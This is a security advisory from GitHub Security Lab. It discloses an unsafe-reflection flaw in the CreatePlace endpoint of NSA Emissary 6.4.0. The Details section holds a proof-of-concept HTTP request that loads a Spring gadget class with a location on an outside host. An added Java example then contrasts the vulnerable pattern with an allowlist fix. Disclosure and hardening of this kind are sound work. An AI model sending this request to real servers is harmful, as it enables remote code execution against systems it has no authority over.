Coordinated Disclosure Timeline

Summary

A logged-in user can cause the application to load an arbitrary class by name and invoke its constructor with untrusted data.

Product

National Security Agency Emissary

Tested Version

6.4.0

Details

The CreatePlace REST endpoint accepts an sppClassName parameter that is used to load an arbitrary class by name. The loaded class is then instantiated through a constructor with the signature <constructor>(String, String, String). An attacker may find a gadget (class) on the application classpath whose three-String constructor can be abused to achieve Remote Code Execution (RCE) or to disrupt the application.

POST /emissary/CreatePlace.action HTTP/1.1
Host: localhost:8001
x-requested-by: 
Content-Type: application/x-www-form-urlencoded
Content-Length: 142

sppClassName=org.springframework.context.support.FileSystemXmlApplicationContext&sppLocation=bar.bar.bar.http%3A%2F%2Fbar.com&sppDirectory=foo
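The pattern the advisory describes, and one way to harden it, as an added example that is not Emissary's code: the class name taken from the request is checked against an allowlist and against an expected base type before any constructor is invoked. All names here (SafePlaceFactory, Place, EchoPlace, createUnsafe, createSafe) are hypothetical; the three String arguments mirror the constructor signature given above, and mapping them to the request parameters is an assumption made for illustration.

```java
import java.lang.reflect.Constructor;
import java.util.Set;

// Hypothetical example (not Emissary's code): reflective instantiation driven by a
// request parameter, shown first as the vulnerable pattern and then hardened.
public final class SafePlaceFactory {

    /** Hypothetical base type that every legitimately creatable class must implement. */
    public interface Place {}

    /** Hypothetical legitimate implementation with the (String, String, String) constructor. */
    public static final class EchoPlace implements Place {
        private final String name, location, directory;

        public EchoPlace(String name, String location, String directory) {
            this.name = name;
            this.location = location;
            this.directory = directory;
        }

        @Override
        public String toString() {
            return "EchoPlace[" + name + ", " + location + ", " + directory + "]";
        }
    }

    // Allowlist of fully qualified class names that may be instantiated from user input.
    private static final Set<String> ALLOWED = Set.of(EchoPlace.class.getName());

    // Vulnerable pattern (schematic of what the advisory describes): any class reachable on
    // the classpath is loaded by name and its three-String constructor is invoked.
    static Object createUnsafe(String className, String a, String b, String c)
            throws ReflectiveOperationException {
        Class<?> clazz = Class.forName(className);
        Constructor<?> ctor = clazz.getConstructor(String.class, String.class, String.class);
        return ctor.newInstance(a, b, c);
    }

    // Hardened form: reject anything not on the allowlist before the class is even loaded,
    // then confirm the type is a Place before calling its constructor.
    static Place createSafe(String className, String a, String b, String c)
            throws ReflectiveOperationException {
        if (!ALLOWED.contains(className)) {
            throw new IllegalArgumentException("class not permitted: " + className);
        }
        // initialize=false: no static initializer runs until after the type check passes.
        Class<?> clazz = Class.forName(className, false, SafePlaceFactory.class.getClassLoader());
        if (!Place.class.isAssignableFrom(clazz)) {
            throw new IllegalArgumentException("not a Place: " + className);
        }
        Constructor<?> ctor = clazz.getConstructor(String.class, String.class, String.class);
        return Place.class.cast(ctor.newInstance(a, b, c));
    }

    public static void main(String[] args) throws ReflectiveOperationException {
        // Constructed inputs: a legitimate class name, then the class name from the request above.
        Place ok = createSafe(EchoPlace.class.getName(), "foo", "bar", "baz");
        System.out.println("created " + ok);
        try {
            createSafe("org.springframework.context.support.FileSystemXmlApplicationContext",
                       "x", "y", "z");
        } catch (IllegalArgumentException e) {
            // Rejected by the allowlist, so the class is never loaded or constructed.
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The allowlist check runs before Class.forName so that unexpected classes are never loaded at all; the isAssignableFrom check is a second layer in case the allowlist is later widened by mistake. Prefer a closed allowlist of concrete class names over a denylist, since the set of three-String constructors on a large classpath is not something a denylist can enumerate.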

Impact

Even though the chances of finding a gadget (class) that allows arbitrary code execution are low, an attacker can still find gadgets that could potentially crash the application or leak sensitive data.

CVE

Resources

Credit

This issue was discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).

Contact

You can contact the GHSL team at securitylab@github.com; please include a reference to GHSL-2021-073 in any communication regarding this issue.